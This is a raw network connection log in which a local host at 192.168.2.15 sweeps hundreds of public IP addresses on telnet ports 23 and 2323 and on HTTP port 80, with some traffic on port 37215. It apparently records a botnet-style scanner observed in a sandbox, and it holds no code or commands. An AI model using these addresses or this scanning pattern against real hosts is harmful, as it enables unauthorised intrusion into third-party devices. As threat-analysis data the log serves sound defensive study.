Feb 25, 2024 19:02:18.879865885 CET	58983	23	192.168.2.15	70.209.223.40
Feb 25, 2024 19:02:18.879878998 CET	58983	23	192.168.2.15	38.136.115.251
Feb 25, 2024 19:02:18.879878998 CET	58983	2323	192.168.2.15	93.22.45.65
Feb 25, 2024 19:02:18.879878998 CET	58983	23	192.168.2.15	70.124.48.147
Feb 25, 2024 19:02:18.879894018 CET	58983	23	192.168.2.15	123.231.74.88
Feb 25, 2024 19:02:18.879894972 CET	58983	23	192.168.2.15	18.13.116.147
Feb 25, 2024 19:02:18.879908085 CET	58983	23	192.168.2.15	164.90.36.9
Feb 25, 2024 19:02:18.879919052 CET	58983	23	192.168.2.15	69.131.145.13
Feb 25, 2024 19:02:18.879921913 CET	58983	23	192.168.2.15	47.85.30.133
Feb 25, 2024 19:02:18.879925966 CET	58983	23	192.168.2.15	57.165.102.240
Feb 25, 2024 19:02:18.879947901 CET	58983	23	192.168.2.15	128.34.119.144
Feb 25, 2024 19:02:18.879949093 CET	58983	2323	192.168.2.15	97.243.130.128
Feb 25, 2024 19:02:18.879947901 CET	58983	23	192.168.2.15	5.187.254.4
Feb 25, 2024 19:02:18.879972935 CET	58983	23	192.168.2.15	8.156.148.28
Feb 25, 2024 19:02:18.879973888 CET	58983	23	192.168.2.15	166.20.41.252
Feb 25, 2024 19:02:18.879990101 CET	58983	23	192.168.2.15	27.103.55.85
Feb 25, 2024 19:02:18.879990101 CET	58983	23	192.168.2.15	209.99.169.210
Feb 25, 2024 19:02:18.879995108 CET	58983	23	192.168.2.15	114.27.121.80
Feb 25, 2024 19:02:18.879996061 CET	58983	23	192.168.2.15	76.59.48.149
Feb 25, 2024 19:02:18.879995108 CET	58983	23	192.168.2.15	161.142.75.108
Feb 25, 2024 19:02:18.879997015 CET	58983	23	192.168.2.15	179.241.221.240
Feb 25, 2024 19:02:18.880000114 CET	58983	23	192.168.2.15	79.110.85.150
Feb 25, 2024 19:02:18.880004883 CET	58983	2323	192.168.2.15	200.227.171.108
Feb 25, 2024 19:02:18.880004883 CET	58983	23	192.168.2.15	20.175.149.124
Feb 25, 2024 19:02:18.880004883 CET	58983	23	192.168.2.15	113.169.160.176
Feb 25, 2024 19:02:18.880024910 CET	58983	23	192.168.2.15	42.192.24.108
Feb 25, 2024 19:02:18.880026102 CET	58983	23	192.168.2.15	198.184.71.114
Feb 25, 2024 19:02:18.880033970 CET	58983	23	192.168.2.15	4.176.172.13
Feb 25, 2024 19:02:18.880042076 CET	58983	23	192.168.2.15	173.134.138.202
Feb 25, 2024 19:02:18.880058050 CET	58983	23	192.168.2.15	79.195.2.1
Feb 25, 2024 19:02:18.880059958 CET	58983	23	192.168.2.15	142.37.170.55
Feb 25, 2024 19:02:18.880069971 CET	58983	23	192.168.2.15	179.198.176.76
Feb 25, 2024 19:02:18.880070925 CET	58983	2323	192.168.2.15	27.152.16.216
Feb 25, 2024 19:02:18.880094051 CET	58983	23	192.168.2.15	73.92.145.210
Feb 25, 2024 19:02:18.880095959 CET	58983	23	192.168.2.15	155.135.36.184
Feb 25, 2024 19:02:18.880106926 CET	58983	23	192.168.2.15	38.110.199.102
Feb 25, 2024 19:02:18.880110025 CET	58983	23	192.168.2.15	105.27.149.227
Feb 25, 2024 19:02:18.880110979 CET	58983	23	192.168.2.15	59.199.129.224
Feb 25, 2024 19:02:18.880115032 CET	58983	23	192.168.2.15	99.68.130.225
Feb 25, 2024 19:02:18.880120993 CET	58983	23	192.168.2.15	32.67.230.95
Feb 25, 2024 19:02:18.880134106 CET	58983	23	192.168.2.15	165.96.221.4
Feb 25, 2024 19:02:18.880134106 CET	58983	23	192.168.2.15	181.245.89.236
Feb 25, 2024 19:02:18.880148888 CET	58983	2323	192.168.2.15	193.89.78.169
Feb 25, 2024 19:02:18.880153894 CET	58983	23	192.168.2.15	78.213.58.216
Feb 25, 2024 19:02:18.880166054 CET	58983	23	192.168.2.15	113.45.68.237
Feb 25, 2024 19:02:18.880177021 CET	58983	23	192.168.2.15	148.156.19.23
Feb 25, 2024 19:02:18.880181074 CET	58983	23	192.168.2.15	212.225.62.232
Feb 25, 2024 19:02:18.880187988 CET	58983	23	192.168.2.15	122.103.182.20
Feb 25, 2024 19:02:18.880187988 CET	58983	23	192.168.2.15	105.195.8.196
Feb 25, 2024 19:02:18.880198956 CET	58983	23	192.168.2.15	223.24.18.186
Feb 25, 2024 19:02:18.880211115 CET	58983	23	192.168.2.15	202.120.125.197
Feb 25, 2024 19:02:18.880211115 CET	58983	2323	192.168.2.15	14.24.35.31
Feb 25, 2024 19:02:18.880212069 CET	58983	23	192.168.2.15	179.51.196.160
Feb 25, 2024 19:02:18.880225897 CET	58983	23	192.168.2.15	53.117.252.93
Feb 25, 2024 19:02:18.880234003 CET	58983	23	192.168.2.15	41.22.77.134
Feb 25, 2024 19:02:18.880237103 CET	58983	23	192.168.2.15	193.141.182.4
Feb 25, 2024 19:02:18.880245924 CET	58983	23	192.168.2.15	48.169.171.39
Feb 25, 2024 19:02:18.880255938 CET	58983	23	192.168.2.15	71.50.95.197
Feb 25, 2024 19:02:18.880270004 CET	58983	23	192.168.2.15	153.65.236.190
Feb 25, 2024 19:02:18.880276918 CET	58983	23	192.168.2.15	151.227.109.44
Feb 25, 2024 19:02:18.880276918 CET	58983	23	192.168.2.15	205.193.213.65
Feb 25, 2024 19:02:18.880284071 CET	58983	23	192.168.2.15	74.185.106.1
Feb 25, 2024 19:02:18.880292892 CET	58983	23	192.168.2.15	114.177.105.12
Feb 25, 2024 19:02:18.880295038 CET	58983	23	192.168.2.15	44.30.255.64
Feb 25, 2024 19:02:18.880306005 CET	58983	23	192.168.2.15	181.74.65.233
Feb 25, 2024 19:02:18.880306959 CET	58983	2323	192.168.2.15	113.50.11.146
Feb 25, 2024 19:02:18.880306959 CET	58983	23	192.168.2.15	144.37.179.203
Feb 25, 2024 19:02:18.880315065 CET	58983	23	192.168.2.15	205.204.144.252
Feb 25, 2024 19:02:18.880319118 CET	58983	23	192.168.2.15	153.163.171.241
Feb 25, 2024 19:02:18.880326033 CET	58983	23	192.168.2.15	71.138.107.136
Feb 25, 2024 19:02:18.880336046 CET	58983	23	192.168.2.15	193.138.98.85
Feb 25, 2024 19:02:18.880337000 CET	58983	23	192.168.2.15	76.241.39.101
Feb 25, 2024 19:02:18.880353928 CET	58983	2323	192.168.2.15	145.99.6.93
Feb 25, 2024 19:02:18.880366087 CET	58983	23	192.168.2.15	155.3.67.246
Feb 25, 2024 19:02:18.880367041 CET	58983	23	192.168.2.15	95.82.121.214
Feb 25, 2024 19:02:18.880367041 CET	58983	23	192.168.2.15	212.89.27.31
Feb 25, 2024 19:02:18.880367041 CET	58983	23	192.168.2.15	1.182.210.125
Feb 25, 2024 19:02:18.880369902 CET	58983	23	192.168.2.15	183.140.247.57
Feb 25, 2024 19:02:18.880374908 CET	58983	23	192.168.2.15	42.123.200.242
Feb 25, 2024 19:02:18.880383968 CET	58983	23	192.168.2.15	25.38.237.16
Feb 25, 2024 19:02:18.880403042 CET	58983	23	192.168.2.15	198.69.171.25
Feb 25, 2024 19:02:18.880405903 CET	58983	23	192.168.2.15	182.56.178.154
Feb 25, 2024 19:02:18.880414963 CET	58983	2323	192.168.2.15	203.82.111.74
Feb 25, 2024 19:02:18.880424023 CET	58983	23	192.168.2.15	151.195.1.175
Feb 25, 2024 19:02:18.880424023 CET	58983	23	192.168.2.15	121.197.124.219
Feb 25, 2024 19:02:18.880443096 CET	58983	23	192.168.2.15	161.37.146.39
Feb 25, 2024 19:02:18.880441904 CET	58983	23	192.168.2.15	49.20.195.196
Feb 25, 2024 19:02:18.880443096 CET	58983	23	192.168.2.15	174.57.140.134
Feb 25, 2024 19:02:18.880458117 CET	58983	23	192.168.2.15	208.34.163.233
Feb 25, 2024 19:02:18.880459070 CET	58983	23	192.168.2.15	134.248.244.19
Feb 25, 2024 19:02:18.880465984 CET	58983	23	192.168.2.15	98.21.161.56
Feb 25, 2024 19:02:18.880479097 CET	58983	23	192.168.2.15	25.114.99.239
Feb 25, 2024 19:02:18.880494118 CET	58983	2323	192.168.2.15	19.39.141.55
Feb 25, 2024 19:02:18.880495071 CET	58983	23	192.168.2.15	179.85.3.164
Feb 25, 2024 19:02:18.880497932 CET	58983	23	192.168.2.15	108.131.165.68
Feb 25, 2024 19:02:18.880502939 CET	58983	23	192.168.2.15	140.204.113.138
Feb 25, 2024 19:02:18.880516052 CET	58983	23	192.168.2.15	134.68.211.140
Feb 25, 2024 19:02:18.880516052 CET	58983	23	192.168.2.15	163.137.209.177
Feb 25, 2024 19:02:18.880536079 CET	58983	23	192.168.2.15	9.119.213.107
Feb 25, 2024 19:02:18.880537987 CET	58983	23	192.168.2.15	118.99.49.226
Feb 25, 2024 19:02:18.880541086 CET	58983	23	192.168.2.15	72.215.168.248
Feb 25, 2024 19:02:18.880546093 CET	58983	23	192.168.2.15	18.221.138.205
Feb 25, 2024 19:02:18.880548000 CET	58983	2323	192.168.2.15	65.62.36.103
Feb 25, 2024 19:02:18.880564928 CET	58983	23	192.168.2.15	70.162.249.203
Feb 25, 2024 19:02:18.880563974 CET	58983	23	192.168.2.15	196.4.120.17
Feb 25, 2024 19:02:18.880569935 CET	58983	23	192.168.2.15	117.253.162.153
Feb 25, 2024 19:02:18.880580902 CET	58983	23	192.168.2.15	89.149.199.242
Feb 25, 2024 19:02:18.880582094 CET	58983	23	192.168.2.15	124.177.215.159
Feb 25, 2024 19:02:18.880592108 CET	58983	23	192.168.2.15	104.218.125.88
Feb 25, 2024 19:02:18.880592108 CET	58983	23	192.168.2.15	110.27.186.127
Feb 25, 2024 19:02:18.880597115 CET	58983	23	192.168.2.15	198.247.59.41
Feb 25, 2024 19:02:18.880601883 CET	58983	23	192.168.2.15	191.144.50.213
Feb 25, 2024 19:02:18.880616903 CET	58983	23	192.168.2.15	177.209.246.118
Feb 25, 2024 19:02:18.880623102 CET	58983	2323	192.168.2.15	31.253.190.244
Feb 25, 2024 19:02:18.880629063 CET	58983	23	192.168.2.15	137.63.159.158
Feb 25, 2024 19:02:18.880639076 CET	58983	23	192.168.2.15	25.22.125.60
Feb 25, 2024 19:02:18.880649090 CET	58983	23	192.168.2.15	153.65.238.144
Feb 25, 2024 19:02:18.880649090 CET	58983	23	192.168.2.15	183.146.216.58
Feb 25, 2024 19:02:18.880660057 CET	58983	23	192.168.2.15	4.192.203.125
Feb 25, 2024 19:02:18.880664110 CET	58983	23	192.168.2.15	181.67.190.97
Feb 25, 2024 19:02:18.880678892 CET	58983	23	192.168.2.15	53.172.152.128
Feb 25, 2024 19:02:18.880691051 CET	58983	23	192.168.2.15	124.172.39.194
Feb 25, 2024 19:02:18.880691051 CET	58983	23	192.168.2.15	187.42.53.105
Feb 25, 2024 19:02:18.880697012 CET	58983	2323	192.168.2.15	154.240.95.26
Feb 25, 2024 19:02:18.880707026 CET	58983	23	192.168.2.15	184.8.133.209
Feb 25, 2024 19:02:18.880707026 CET	58983	23	192.168.2.15	182.106.206.246
Feb 25, 2024 19:02:18.880712032 CET	58983	23	192.168.2.15	113.53.11.228
Feb 25, 2024 19:02:18.880731106 CET	58983	23	192.168.2.15	122.141.203.32
Feb 25, 2024 19:02:18.880733967 CET	58983	23	192.168.2.15	158.64.157.17
Feb 25, 2024 19:02:18.880740881 CET	58983	23	192.168.2.15	206.20.90.102
Feb 25, 2024 19:02:18.880747080 CET	58983	23	192.168.2.15	183.182.80.51
Feb 25, 2024 19:02:18.880769968 CET	58983	23	192.168.2.15	57.218.228.168
Feb 25, 2024 19:02:18.880772114 CET	58983	2323	192.168.2.15	128.159.37.46
Feb 25, 2024 19:02:18.880791903 CET	58983	23	192.168.2.15	210.149.150.139
Feb 25, 2024 19:02:18.880800962 CET	58983	23	192.168.2.15	47.62.159.161
Feb 25, 2024 19:02:18.880801916 CET	58983	23	192.168.2.15	181.7.128.134
Feb 25, 2024 19:02:18.887065887 CET	59858	80	192.168.2.15	95.56.25.22
Feb 25, 2024 19:02:18.887075901 CET	55722	80	192.168.2.15	95.100.51.55
Feb 25, 2024 19:02:18.887079954 CET	58466	80	192.168.2.15	95.86.72.116
Feb 25, 2024 19:02:18.887080908 CET	59244	80	192.168.2.15	95.217.209.101
Feb 25, 2024 19:02:18.887080908 CET	40882	80	192.168.2.15	95.56.81.125
Feb 25, 2024 19:02:18.887080908 CET	48418	80	192.168.2.15	95.217.145.162
Feb 25, 2024 19:02:18.887089014 CET	54734	80	192.168.2.15	95.85.27.7
Feb 25, 2024 19:02:19.019932032 CET	23	58983	98.50.85.93	192.168.2.15
Feb 25, 2024 19:02:19.041973114 CET	80	6502	95.164.112.148	192.168.2.15
Feb 25, 2024 19:02:19.042181969 CET	6502	80	192.168.2.15	95.164.112.148
Feb 25, 2024 19:02:19.056606054 CET	8080	6758	95.125.191.186	192.168.2.15
Feb 25, 2024 19:02:19.062407970 CET	80	54734	95.85.27.7	192.168.2.15
Feb 25, 2024 19:02:19.062601089 CET	54756	80	192.168.2.15	95.85.27.7
Feb 25, 2024 19:02:19.062601089 CET	54734	80	192.168.2.15	95.85.27.7
Feb 25, 2024 19:02:19.062601089 CET	34578	80	192.168.2.15	95.164.112.148
Feb 25, 2024 19:02:19.062601089 CET	54734	80	192.168.2.15	95.85.27.7
Feb 25, 2024 19:02:19.062601089 CET	54734	80	192.168.2.15	95.85.27.7
Feb 25, 2024 19:02:19.063819885 CET	80	6502	95.90.146.125	192.168.2.15
Feb 25, 2024 19:02:19.063870907 CET	6502	80	192.168.2.15	95.90.146.125
Feb 25, 2024 19:02:19.081760883 CET	80	59244	95.217.209.101	192.168.2.15
Feb 25, 2024 19:02:19.081809044 CET	80	48418	95.217.145.162	192.168.2.15
Feb 25, 2024 19:02:19.081945896 CET	59268	80	192.168.2.15	95.217.209.101
Feb 25, 2024 19:02:19.081947088 CET	47292	80	192.168.2.15	95.90.146.125
Feb 25, 2024 19:02:19.081947088 CET	48442	80	192.168.2.15	95.217.145.162
Feb 25, 2024 19:02:19.082058907 CET	59244	80	192.168.2.15	95.217.209.101
Feb 25, 2024 19:02:19.082058907 CET	59244	80	192.168.2.15	95.217.209.101
Feb 25, 2024 19:02:19.082058907 CET	59244	80	192.168.2.15	95.217.209.101
Feb 25, 2024 19:02:19.082096100 CET	48418	80	192.168.2.15	95.217.145.162
Feb 25, 2024 19:02:19.082096100 CET	48418	80	192.168.2.15	95.217.145.162
Feb 25, 2024 19:02:19.082096100 CET	48418	80	192.168.2.15	95.217.145.162
Feb 25, 2024 19:02:19.083170891 CET	80	6502	95.165.132.141	192.168.2.15
Feb 25, 2024 19:02:19.083220959 CET	6502	80	192.168.2.15	95.165.132.141
Feb 25, 2024 19:02:19.098093033 CET	23	58983	179.167.66.102	192.168.2.15
Feb 25, 2024 19:02:19.121015072 CET	80	58466	95.86.72.116	192.168.2.15
Feb 25, 2024 19:02:19.121170998 CET	58492	80	192.168.2.15	95.86.72.116
Feb 25, 2024 19:02:19.121186972 CET	58466	80	192.168.2.15	95.86.72.116
Feb 25, 2024 19:02:19.121186972 CET	58466	80	192.168.2.15	95.86.72.116
Feb 25, 2024 19:02:19.121186972 CET	58466	80	192.168.2.15	95.86.72.116
Feb 25, 2024 19:02:19.121308088 CET	43494	80	192.168.2.15	95.165.132.141
Feb 25, 2024 19:02:19.137276888 CET	23	58983	196.93.229.6	192.168.2.15
Feb 25, 2024 19:02:19.139043093 CET	80	55722	95.100.51.55	192.168.2.15
Feb 25, 2024 19:02:19.139225960 CET	55722	80	192.168.2.15	95.100.51.55
Feb 25, 2024 19:02:19.139225960 CET	55722	80	192.168.2.15	95.100.51.55
Feb 25, 2024 19:02:19.139225960 CET	55722	80	192.168.2.15	95.100.51.55
Feb 25, 2024 19:02:19.139226913 CET	55748	80	192.168.2.15	95.100.51.55
Feb 25, 2024 19:02:19.140697002 CET	37215	6246	197.131.34.42	192.168.2.15
Feb 25, 2024 19:02:19.154562950 CET	80	40882	95.56.81.125	192.168.2.15
Feb 25, 2024 19:02:19.154846907 CET	40908	80	192.168.2.15	95.56.81.125
Feb 25, 2024 19:02:19.154983044 CET	40882	80	192.168.2.15	95.56.81.125
Feb 25, 2024 19:02:19.154983044 CET	40882	80	192.168.2.15	95.56.81.125
Feb 25, 2024 19:02:19.154983997 CET	40882	80	192.168.2.15	95.56.81.125
Feb 25, 2024 19:02:19.158233881 CET	80	59858	95.56.25.22	192.168.2.15
Feb 25, 2024 19:02:19.158292055 CET	59858	80	192.168.2.15	95.56.25.22
Feb 25, 2024 19:02:19.158292055 CET	59858	80	192.168.2.15	95.56.25.22
Feb 25, 2024 19:02:19.158292055 CET	59858	80	192.168.2.15	95.56.25.22
Feb 25, 2024 19:02:19.158308983 CET	59884	80	192.168.2.15	95.56.25.22
Feb 25, 2024 19:02:19.183047056 CET	37215	6246	197.8.196.165	192.168.2.15
Feb 25, 2024 19:02:19.233983040 CET	80	54756	95.85.27.7	192.168.2.15
Feb 25, 2024 19:02:19.234141111 CET	54756	80	192.168.2.15	95.85.27.7
Feb 25, 2024 19:02:19.234141111 CET	54756	80	192.168.2.15	95.85.27.7
Feb 25, 2024 19:02:19.237452984 CET	80	54734	95.85.27.7	192.168.2.15
Feb 25, 2024 19:02:19.237581968 CET	80	34578	95.164.112.148	192.168.2.15
Feb 25, 2024 19:02:19.237660885 CET	34578	80	192.168.2.15	95.164.112.148
Feb 25, 2024 19:02:19.237660885 CET	34578	80	192.168.2.15	95.164.112.148
Feb 25, 2024 19:02:19.237660885 CET	34578	80	192.168.2.15	95.164.112.148
Feb 25, 2024 19:02:19.237683058 CET	34598	80	192.168.2.15	95.164.112.148
Feb 25, 2024 19:02:19.238279104 CET	80	54734	95.85.27.7	192.168.2.15
Feb 25, 2024 19:02:19.238343000 CET	54734	80	192.168.2.15	95.85.27.7
Feb 25, 2024 19:02:19.250938892 CET	37215	6246	197.232.139.39	192.168.2.15
Feb 25, 2024 19:02:19.262867928 CET	37215	6246	197.128.144.82	192.168.2.15
Feb 25, 2024 19:02:19.275880098 CET	80	48442	95.217.145.162	192.168.2.15
Feb 25, 2024 19:02:19.276124001 CET	48442	80	192.168.2.15	95.217.145.162
Feb 25, 2024 19:02:19.276124001 CET	48442	80	192.168.2.15	95.217.145.162
Feb 25, 2024 19:02:19.276470900 CET	80	59244	95.217.209.101	192.168.2.15
Feb 25, 2024 19:02:19.278865099 CET	80	48418	95.217.145.162	192.168.2.15
Feb 25, 2024 19:02:19.279444933 CET	80	59244	95.217.209.101	192.168.2.15
Feb 25, 2024 19:02:19.279462099 CET	80	59244	95.217.209.101	192.168.2.15
Feb 25, 2024 19:02:19.279473066 CET	80	48418	95.217.145.162	192.168.2.15
Feb 25, 2024 19:02:19.279484987 CET	80	48418	95.217.145.162	192.168.2.15
Feb 25, 2024 19:02:19.279500961 CET	80	59268	95.217.209.101	192.168.2.15
Feb 25, 2024 19:02:19.279536009 CET	59244	80	192.168.2.15	95.217.209.101
Feb 25, 2024 19:02:19.279572964 CET	48418	80	192.168.2.15	95.217.145.162
Feb 25, 2024 19:02:19.279575109 CET	59244	80	192.168.2.15	95.217.209.101
Feb 25, 2024 19:02:19.279588938 CET	48418	80	192.168.2.15	95.217.145.162
Feb 25, 2024 19:02:19.279622078 CET	59268	80	192.168.2.15	95.217.209.101
Feb 25, 2024 19:02:19.279622078 CET	59268	80	192.168.2.15	95.217.209.101
Feb 25, 2024 19:02:19.285023928 CET	80	47292	95.90.146.125	192.168.2.15
Feb 25, 2024 19:02:19.285099030 CET	47292	80	192.168.2.15	95.90.146.125
Feb 25, 2024 19:02:19.285109997 CET	47292	80	192.168.2.15	95.90.146.125
Feb 25, 2024 19:02:19.285115957 CET	47292	80	192.168.2.15	95.90.146.125
Feb 25, 2024 19:02:19.285144091 CET	47310	80	192.168.2.15	95.90.146.125
Feb 25, 2024 19:02:19.343158960 CET	80	43494	95.165.132.141	192.168.2.15
Feb 25, 2024 19:02:19.343349934 CET	43508	80	192.168.2.15	95.165.132.141
Feb 25, 2024 19:02:19.343370914 CET	43494	80	192.168.2.15	95.165.132.141
Feb 25, 2024 19:02:19.343370914 CET	43494	80	192.168.2.15	95.165.132.141
Feb 25, 2024 19:02:19.343370914 CET	43494	80	192.168.2.15	95.165.132.141
Feb 25, 2024 19:02:19.355089903 CET	80	58492	95.86.72.116	192.168.2.15
Feb 25, 2024 19:02:19.355176926 CET	80	58466	95.86.72.116	192.168.2.15
Feb 25, 2024 19:02:19.355263948 CET	58492	80	192.168.2.15	95.86.72.116
Feb 25, 2024 19:02:19.355264902 CET	58492	80	192.168.2.15	95.86.72.116
Feb 25, 2024 19:02:19.356689930 CET	80	58466	95.86.72.116	192.168.2.15
Feb 25, 2024 19:02:19.356735945 CET	58466	80	192.168.2.15	95.86.72.116
Feb 25, 2024 19:02:19.397766113 CET	80	55722	95.100.51.55	192.168.2.15
Feb 25, 2024 19:02:19.405989885 CET	80	54756	95.85.27.7	192.168.2.15
Feb 25, 2024 19:02:19.406120062 CET	54756	80	192.168.2.15	95.85.27.7
Feb 25, 2024 19:02:19.412818909 CET	80	34578	95.164.112.148	192.168.2.15
Feb 25, 2024 19:02:19.412856102 CET	80	34598	95.164.112.148	192.168.2.15
Feb 25, 2024 19:02:19.412908077 CET	34598	80	192.168.2.15	95.164.112.148
Feb 25, 2024 19:02:19.412908077 CET	34598	80	192.168.2.15	95.164.112.148
Feb 25, 2024 19:02:19.412935972 CET	6502	80	192.168.2.15	95.105.239.223
Feb 25, 2024 19:02:19.412945032 CET	6502	80	192.168.2.15	95.158.99.149
Feb 25, 2024 19:02:19.412949085 CET	6502	80	192.168.2.15	95.25.115.94
Feb 25, 2024 19:02:19.412955999 CET	6502	80	192.168.2.15	95.141.72.215
Feb 25, 2024 19:02:19.412961006 CET	6502	80	192.168.2.15	95.166.172.216
Feb 25, 2024 19:02:19.412964106 CET	6502	80	192.168.2.15	95.157.20.135
Feb 25, 2024 19:02:19.412969112 CET	6502	80	192.168.2.15	95.31.233.198
Feb 25, 2024 19:02:19.412988901 CET	6502	80	192.168.2.15	95.229.171.176
Feb 25, 2024 19:02:19.412990093 CET	6502	80	192.168.2.15	95.113.200.241
Feb 25, 2024 19:02:19.412996054 CET	6502	80	192.168.2.15	95.182.190.214
Feb 25, 2024 19:02:19.413005114 CET	6502	80	192.168.2.15	95.124.173.110
Feb 25, 2024 19:02:19.413007975 CET	6502	80	192.168.2.15	95.227.49.201
Feb 25, 2024 19:02:19.413018942 CET	6502	80	192.168.2.15	95.196.197.204
Feb 25, 2024 19:02:19.413018942 CET	6502	80	192.168.2.15	95.0.114.145
Feb 25, 2024 19:02:19.413023949 CET	6502	80	192.168.2.15	95.130.195.242
Feb 25, 2024 19:02:19.413024902 CET	6502	80	192.168.2.15	95.111.252.228
Feb 25, 2024 19:02:19.413029909 CET	6502	80	192.168.2.15	95.137.118.206
Feb 25, 2024 19:02:19.413042068 CET	6502	80	192.168.2.15	95.65.226.48
Feb 25, 2024 19:02:19.413053989 CET	6502	80	192.168.2.15	95.217.76.252
Feb 25, 2024 19:02:19.413060904 CET	6502	80	192.168.2.15	95.100.152.149
Feb 25, 2024 19:02:19.413069010 CET	6502	80	192.168.2.15	95.247.206.208
Feb 25, 2024 19:02:19.413069963 CET	6502	80	192.168.2.15	95.139.176.6
Feb 25, 2024 19:02:19.413084984 CET	6502	80	192.168.2.15	95.136.202.152
Feb 25, 2024 19:02:19.413096905 CET	6502	80	192.168.2.15	95.47.92.110
Feb 25, 2024 19:02:19.413100004 CET	6502	80	192.168.2.15	95.143.42.97
Feb 25, 2024 19:02:19.413115025 CET	6502	80	192.168.2.15	95.17.224.64
Feb 25, 2024 19:02:19.413124084 CET	6502	80	192.168.2.15	95.5.117.66
Feb 25, 2024 19:02:19.413124084 CET	6502	80	192.168.2.15	95.138.38.173
Feb 25, 2024 19:02:19.413131952 CET	6502	80	192.168.2.15	95.200.207.198
Feb 25, 2024 19:02:19.413134098 CET	6502	80	192.168.2.15	95.62.1.201
Feb 25, 2024 19:02:19.413144112 CET	6502	80	192.168.2.15	95.2.84.178
Feb 25, 2024 19:02:19.413146019 CET	6502	80	192.168.2.15	95.199.35.158
Feb 25, 2024 19:02:19.413144112 CET	6502	80	192.168.2.15	95.49.102.147
Feb 25, 2024 19:02:19.413144112 CET	6502	80	192.168.2.15	95.126.217.160
Feb 25, 2024 19:02:19.413152933 CET	6502	80	192.168.2.15	95.244.16.19
Feb 25, 2024 19:02:19.413160086 CET	6502	80	192.168.2.15	95.91.9.84
Feb 25, 2024 19:02:19.413173914 CET	6502	80	192.168.2.15	95.231.190.135
Feb 25, 2024 19:02:19.413182020 CET	6502	80	192.168.2.15	95.104.67.21
Feb 25, 2024 19:02:19.413187981 CET	6502	80	192.168.2.15	95.86.37.126
Feb 25, 2024 19:02:19.413196087 CET	6502	80	192.168.2.15	95.248.237.77
Feb 25, 2024 19:02:19.413198948 CET	6502	80	192.168.2.15	95.138.153.145
Feb 25, 2024 19:02:19.413199902 CET	6502	80	192.168.2.15	95.18.160.92
Feb 25, 2024 19:02:19.413203001 CET	6502	80	192.168.2.15	95.120.233.216
Feb 25, 2024 19:02:19.413206100 CET	6502	80	192.168.2.15	95.117.109.162
Feb 25, 2024 19:02:19.413207054 CET	6502	80	192.168.2.15	95.243.43.209
Feb 25, 2024 19:02:19.413222075 CET	6502	80	192.168.2.15	95.213.239.194
Feb 25, 2024 19:02:19.413228989 CET	6502	80	192.168.2.15	95.67.37.235
Feb 25, 2024 19:02:19.413235903 CET	6502	80	192.168.2.15	95.7.251.148
Feb 25, 2024 19:02:19.413248062 CET	6502	80	192.168.2.15	95.172.135.134
Feb 25, 2024 19:02:19.413253069 CET	6502	80	192.168.2.15	95.75.108.106
Feb 25, 2024 19:02:19.413259029 CET	6502	80	192.168.2.15	95.129.132.178
Feb 25, 2024 19:02:19.413264990 CET	6502	80	192.168.2.15	95.61.255.170
Feb 25, 2024 19:02:19.413280010 CET	6502	80	192.168.2.15	95.238.238.195
Feb 25, 2024 19:02:19.413280010 CET	6502	80	192.168.2.15	95.90.173.0
Feb 25, 2024 19:02:19.413290024 CET	6502	80	192.168.2.15	95.171.25.179
Feb 25, 2024 19:02:19.413292885 CET	6502	80	192.168.2.15	95.192.104.191
Feb 25, 2024 19:02:19.413304090 CET	6502	80	192.168.2.15	95.58.134.204
Feb 25, 2024 19:02:19.413305044 CET	6502	80	192.168.2.15	95.179.126.129
Feb 25, 2024 19:02:19.413314104 CET	6502	80	192.168.2.15	95.164.145.211
Feb 25, 2024 19:02:19.413324118 CET	6502	80	192.168.2.15	95.10.206.29
Feb 25, 2024 19:02:19.413327932 CET	6502	80	192.168.2.15	95.56.68.236
Feb 25, 2024 19:02:19.413333893 CET	6502	80	192.168.2.15	95.60.99.219
Feb 25, 2024 19:02:19.413342953 CET	6502	80	192.168.2.15	95.182.177.176
Feb 25, 2024 19:02:19.413352013 CET	6502	80	192.168.2.15	95.62.101.104
Feb 25, 2024 19:02:19.413352013 CET	6502	80	192.168.2.15	95.110.240.241
Feb 25, 2024 19:02:19.413352966 CET	6502	80	192.168.2.15	95.212.75.157
Feb 25, 2024 19:02:19.413360119 CET	6502	80	192.168.2.15	95.101.143.7
Feb 25, 2024 19:02:19.413362980 CET	6502	80	192.168.2.15	95.61.94.253
Feb 25, 2024 19:02:19.413372040 CET	6502	80	192.168.2.15	95.168.54.239
Feb 25, 2024 19:02:19.413377047 CET	6502	80	192.168.2.15	95.143.234.205
Feb 25, 2024 19:02:19.413386106 CET	6502	80	192.168.2.15	95.158.55.123
Feb 25, 2024 19:02:19.413386106 CET	6502	80	192.168.2.15	95.161.96.131
Feb 25, 2024 19:02:19.413397074 CET	6502	80	192.168.2.15	95.37.26.73
Feb 25, 2024 19:02:19.413397074 CET	6502	80	192.168.2.15	95.105.142.9
Feb 25, 2024 19:02:19.413408041 CET	6502	80	192.168.2.15	95.95.143.14
Feb 25, 2024 19:02:19.413419962 CET	6502	80	192.168.2.15	95.45.27.174
Feb 25, 2024 19:02:19.413422108 CET	6502	80	192.168.2.15	95.22.61.57
Feb 25, 2024 19:02:19.413423061 CET	6502	80	192.168.2.15	95.193.184.48
Feb 25, 2024 19:02:19.413424969 CET	6502	80	192.168.2.15	95.133.251.65
Feb 25, 2024 19:02:19.413425922 CET	6502	80	192.168.2.15	95.13.188.45
Feb 25, 2024 19:02:19.413440943 CET	6502	80	192.168.2.15	95.41.60.68
Feb 25, 2024 19:02:19.413440943 CET	6502	80	192.168.2.15	95.18.132.155
Feb 25, 2024 19:02:19.413440943 CET	6502	80	192.168.2.15	95.49.13.88
Feb 25, 2024 19:02:19.413450956 CET	6502	80	192.168.2.15	95.114.101.109
Feb 25, 2024 19:02:19.413461924 CET	6502	80	192.168.2.15	95.122.133.128
Feb 25, 2024 19:02:19.413463116 CET	6502	80	192.168.2.15	95.110.15.74
Feb 25, 2024 19:02:19.413469076 CET	6502	80	192.168.2.15	95.152.191.7
Feb 25, 2024 19:02:19.413481951 CET	6502	80	192.168.2.15	95.223.30.109
Feb 25, 2024 19:02:19.413489103 CET	6502	80	192.168.2.15	95.17.167.119
Feb 25, 2024 19:02:19.413490057 CET	6502	80	192.168.2.15	95.68.175.70
Feb 25, 2024 19:02:19.413500071 CET	6502	80	192.168.2.15	95.22.39.17
Feb 25, 2024 19:02:19.413503885 CET	6502	80	192.168.2.15	95.85.74.124
Feb 25, 2024 19:02:19.413511992 CET	6502	80	192.168.2.15	95.217.108.249
Feb 25, 2024 19:02:19.413511992 CET	6502	80	192.168.2.15	95.231.65.190
Feb 25, 2024 19:02:19.413515091 CET	6502	80	192.168.2.15	95.67.92.172
